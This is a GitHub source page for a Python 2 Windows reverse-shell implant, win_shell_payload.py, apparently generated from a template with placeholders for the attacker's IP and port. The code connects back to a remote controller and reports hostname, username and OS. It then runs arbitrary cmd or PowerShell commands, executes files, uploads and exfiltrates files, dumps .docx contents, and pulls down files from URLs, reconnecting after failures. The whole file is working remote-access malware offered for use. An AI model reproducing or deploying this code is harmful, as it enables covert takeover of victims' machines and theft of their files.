-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathwin_shell_payload.py
309 lines (286 loc) · 11.5 KB
/
win_shell_payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
import subprocess, os, socket, re, pickle, docx, urllib2
from platform import platform
from getpass import getuser
from time import sleep
from datetime import datetime
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Command Shell'
try:
operating_sys = platform()
except:
operating_sys = '?????'
try:
hostname = socket.gethostname()
except:
hostname = '?????'
try:
username = getuser()
except:
username = '?????'
userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
powershell = False
s = None
help_menu = '''\nCommand Shell Menu
==================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Command Shell Commands :
exec <shell command> Executes shell command and returns output
exec_file <file/executable> Executes a file/executable without blocking
toggle toggle whether commands are run by powershell or cmd
File Commands :
download <filepath> Download file
dump <filepath> Dump and view file content(supports .docx file)
upload <filepath> Upload a file
web_download <url> Download a file through a url\n'''
def basename(filepath):
basename = re.search(r'[^\\/]+(?=[\\/]?$)', filepath)
if basename:
return basename.group(0)
def recvall(tar_socket):
tar_socket.settimeout(None)
data = tar_socket.recv(9999)
if not data:
return ''
while True:
if data.endswith(End):
try:
tar_socket.settimeout(1)
more_data = tar_socket.recv(9999)
if not more_data:
return data[:-len(End)]
data += more_data
except (socket.timeout,socket.error):
tar_socket.settimeout(None)
return data[:-len(End)]
else:
more_data = tar_socket.recv(9999)
data += more_data
def shell_execute(execute):
if execute[:3] == 'cd ':
try:
execute = execute.replace('cd ', '')
os.chdir(execute)
s.sendall("[+]Changed to directory : " + execute + End)
except:
s.sendall('[-]Could not change to directory : ' + execute + End)
else:
try:
if not powershell:
result = subprocess.Popen(execute, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
else:
try:
result = subprocess.Popen(['powershell.exe', execute], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
except:
s.sendall('[-]Error executing powershell command' + End)
return
result = result.stdout.read() + result.stderr.read()
try:
s.sendall(unicode(result + End))
except:
s.sendall(result + End)
except socket.error:
s.sendall('[-]Could not execute command' + End)
def file_execute(command):
try:
os.startfile(command)
s.sendall('[+]Executed : ' + command + End)
except WindowsError:
s.sendall('[-]Excutable/file, "' + command + '" does not exist' + End)
except Exception as e:
s.sendall('[-]Error executing, "' + command + '" : ' + str(e) + End)
def upload_file(file_name, content):
try:
f = open(basename(file_name), 'wb')
f.write(content)
f.close()
s.sendall('[+]Uploaded file successfully' + End)
except Exception as e:
s.sendall('[-]Error writing to file "' + file_name + '" : ' + str(e) + End)
def download_file(file_name):
if os.path.isfile(file_name):
try:
f = open(file_name, 'rb')
bin_data = f.read()
f.close()
s.sendall(file_name + '|/' + bin_data + End)
except Exception as e:
s.sendall('[-]Error reading from file "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
def dump_file(file_name):
try:
if os.path.isfile(file_name):
extension = basename(file_name).split('.')[-1] #
if extension == 'docx':
try:
doc = docx.Document(file_name)
data = '\n\n'.join([paragraph.text.encode('utf-8') for paragraph in doc.paragraphs])
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
try:
f = open(file_name, 'rb')
data = f.read()
f.close()
try:
s.sendall(unicode(data + End))
except:
try:
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error dumping file "' + basename(file_name) + '" : ' + str(e) + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
except Exception as e:
s.sendall('[-]Error dumping file : ' + str(e) + End)
def download_from_web(url):
try:
url_data = url.split('/')[-1]
file_name = urllib2.unquote(url_data)
if file_name == '':
file_name = datetime.now().strftime("%Y%m%d-%H%M%S")
response = urllib2.urlopen(url)
data = response.read()
f = open(file_name, 'wb')
f.write(data)
f.close()
s.sendall('[+]Downloaded : ' + url + ' -> ' + file_name + End)
except Exception as e:
s.sendall('[-]Error downloading file : ' + str(e) + End)
def main():
global s, powershell
while True:
while True:
try:
s = socket.socket()
s.connect((ip_addr, port))
s.sendall(pickle.dumps(scout_data) + End)
break
except:
sleep(time_to_sleep)
continue
while True:
try:
s.settimeout(None)
data = recvall(s)
data = data.split(' ', 1)
command = data[0]
if command == 'help':
s.sendall(help_menu + End)
elif command == 'disconnect':
s.sendall('[*]Disconnecting...' + End)
sleep(5)
break
elif command == 'terminate':
s.sendall('[*]Terminating scout...' + End)
os._exit(1)
elif command == 'sleep':
try:
sleep_time = int(data[1])
except:
s.sendall('[-]Please specify an integer as the sleep duration' + End)
continue
s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
s.shutdown(1)
s.close()
for i in range(sleep_time):
sleep(1)
break
elif command == 'exec':
try:
execute = data[1]
except:
s.sendall('[-]Specify a command to execute' + End)
continue
shell_execute(execute)
elif command == 'exec_file':
try:
execute = data[1]
except:
s.sendall('[-]Specify command/file to execute' + End)
continue
file_execute(execute)
elif command == 'toggle':
powershell = not powershell
if powershell:
s.sendall('[*]Executing shell commands with powershell' + End)
else:
s.sendall('[*]Executing shell commands with cmd' + End)
elif command == 'download':
try:
file_name = data[1]
except:
s.sendall('[-]Specify file to download' + End)
continue
download_file(file_name)
elif command == 'upload':
data = data[1].split('|/', 1)
file_name = data[0]
file_contents = data[1]
upload_file(file_name, file_contents)
elif command == 'dump':
try:
file_target = data[1]
except:
s.sendall('[-]Specify file to dump contents of' + End)
continue
dump_file(file_target)
elif command == 'web_download':
try:
download_from_web(data[1])
except IndexError:
s.sendall('[-]Specify URL to download from' + End)
continue
except Exception as e:
s.sendall('[-]Error downloading from url : ' + str(e) + End)
continue
elif command == 'ping':
s.sendall('[+]Scout is alive' + End)
elif command == '':
break
else:
s.sendall('[-]Unknown command "' + command + '", run "help" for help menu'+End)
except (socket.error, socket.timeout):
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
except Exception as e:
try:
if command:
s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
else:
s.sendall('[-]Error message : ' + str(e) + End)
except socket.error:
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
main()